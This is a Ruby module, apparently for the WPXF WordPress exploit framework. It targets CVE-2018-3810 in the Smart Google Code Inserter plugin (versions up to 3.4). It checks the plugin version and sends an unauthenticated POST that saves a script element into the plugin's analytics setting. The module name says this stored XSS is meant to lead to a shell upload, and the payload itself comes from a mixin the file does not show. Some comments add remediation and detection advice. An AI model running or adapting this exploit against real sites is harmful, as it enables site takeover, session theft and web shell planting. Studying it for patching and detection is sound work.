# frozen_string_literal: true

# WPXF module for the stored XSS issue in the Smart Google Code Inserter
# WordPress plugin tracked as CVE-2018-3810 / WPVDB 8987.
#
# Everything beyond the metadata, the version check and the single settings
# request below comes from Wpxf::Module and the Wpxf::WordPress::StoredXss
# mixin, neither of which is visible in this file.
#
# Defensive notes, derived from what this file shows:
# - Remediation: the version check treats 3.5 as the boundary release, so
#   sites should run the plugin at 3.5 or later (the module name lists <= 3.4
#   as affected).
# - Detection: the request is a POST to wp-admin/options-general.php with
#   page=smartcode in the query string and action=savegooglecode in the body.
#   The module name describes the issue as unauthenticated, so such a request
#   arriving without an administrator session is worth alerting on.
# - Triage: the 'sgcgoogleanalytic' setting is where the markup is stored;
#   review its saved value for script content the site owner did not add.
class Wpxf::Exploit::SmartGoogleCodeInserterXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::StoredXss

  # Runs the parent initializer and then registers the module's descriptive
  # metadata (title, credits, advisory references, disclosure date).
  def initialize
    super

    credits = [
      'Benjamin Lim', # Disclosure
      'rastating'     # WPXF module
    ]
    advisories = [
      ['CVE', '2018-3810'],
      ['WPVDB', '8987']
    ]

    update_info(
      name: 'Smart Google Code Inserter <= 3.4 Unauthenticated Stored XSS Shell Upload',
      author: credits,
      references: advisories,
      date: 'Jan 01 2018'
    )
  end

  # Delegates to the framework's readme-based version check for this plugin.
  # NOTE(review): '3.5' is presumably the first fixed release, matching the
  # "<= 3.4" in the module name; the helper's exact semantics are defined
  # outside this file.
  def check
    plugin_slug = 'smart-google-code-inserter'
    boundary_version = '3.5'
    check_plugin_version_from_readme(plugin_slug, boundary_version)
  end

  # Submits the plugin's settings form with the analytics field wrapped in a
  # script element whose content is supplied by xss_include_script (defined
  # outside this file, presumably by the StoredXss mixin).
  # Returns whatever execute_post_request returns.
  def store_script
    settings_url = normalize_uri(wordpress_url_admin, 'options-general.php')

    # Field names mirror the plugin's own settings form; the 'action' value
    # selects its save handler.
    form_fields = {
      'sgcgoogleanalytic' => "<script>#{xss_include_script}</script>",
      'sgcwebtools' => '',
      'button' => 'Save Changes',
      'action' => 'savegooglecode'
    }

    execute_post_request(
      url: settings_url,
      params: { 'page' => 'smartcode' },
      body: form_fields
    )
  end
end
